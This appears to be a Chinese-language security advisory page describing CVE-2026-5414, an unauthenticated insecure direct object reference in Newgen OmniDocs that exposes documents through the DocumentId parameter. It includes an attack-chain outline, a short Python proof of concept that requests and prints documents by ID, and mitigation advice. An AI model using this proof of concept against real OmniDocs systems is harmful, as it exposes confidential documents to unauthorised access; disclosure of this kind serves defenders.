IPBUF安全漏洞报告
English
CVE-2026-5414 CVSS 5.3 中危

CVE-2026-5414 Newgen OmniDocs IDOR漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-5414
漏洞类型
不安全的直接对象引用 (IDOR)
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Newgen OmniDocs

相关标签

IDOR信息泄露Newgen OmniDocs权限绕过CVE-2026-5414

漏洞概述

Newgen OmniDocs 12.0.00及之前版本存在安全漏洞。该问题位于/omnidocs/WebApiRequestRedirection文件中,由于对DocumentId参数处理不当,导致资源标识符控制缺失。未经身份验证的远程攻击者可利用此漏洞,通过操纵该参数访问未授权的资源,造成敏感信息泄露。目前厂商已收到通知但尚未做出响应。

技术细节

该漏洞属于典型的不安全的直接对象引用(IDOR)。在Newgen OmniDocs的处理逻辑中,/omnidocs/WebApiRequestRedirection接口直接接收用户传入的DocumentId参数来定位和检索文档资源,而未在服务器端对当前请求者的身份权限进行校验。由于CVSS向量显示无需权限(PR:N)且无用户交互(UI:N),攻击者可以轻易构造恶意HTTP请求,通过枚举或猜测DocumentId的值,遍历系统内的文档ID。成功利用后,攻击者可读取本应受保护的文档内容,导致机密性泄露(C:L),但不会影响系统的完整性或可用性。鉴于利用代码已公开,该风险需引起重视。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统运行的是Newgen OmniDocs,且版本低于或等于12.0.00。
STEP 2
漏洞探测
攻击者向/omnidocs/WebApiRequestRedirection端点发送包含特定DocumentId的HTTP请求,观察响应是否返回文档内容。
STEP 3
利用
由于未进行权限验证,攻击者通过批量修改DocumentId参数,遍历并请求不同的文档ID。
STEP 4
数据泄露
服务器返回攻击者无权访问的文档内容,导致敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_host = "http://target-ip:port" vulnerable_path = "/omnidocs/WebApiRequestRedirection" # The DocumentId parameter is vulnerable to IDOR # An attacker can change this ID to access other documents payload_params = { "DocumentId": "12345" # Try changing this value } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Sending the request response = requests.get(target_host + vulnerable_path, params=payload_params, headers=headers, timeout=10) # Check if the response indicates success or data leakage if response.status_code == 200: print("[+] Potential access gained to DocumentId:", payload_params["DocumentId"]) print("[+] Response snippet:", response.text[:200]) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

影响范围

Newgen OmniDocs <= 12.0.00

防御指南

临时缓解措施
建议在WAF或网关层面限制对/omnidocs/WebApiRequestRedirection接口的访问频率,并添加针对DocumentId参数的异常检测规则。同时,应临时通过网络隔离措施限制对OmniDocs系统的公网访问,直至补丁发布。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表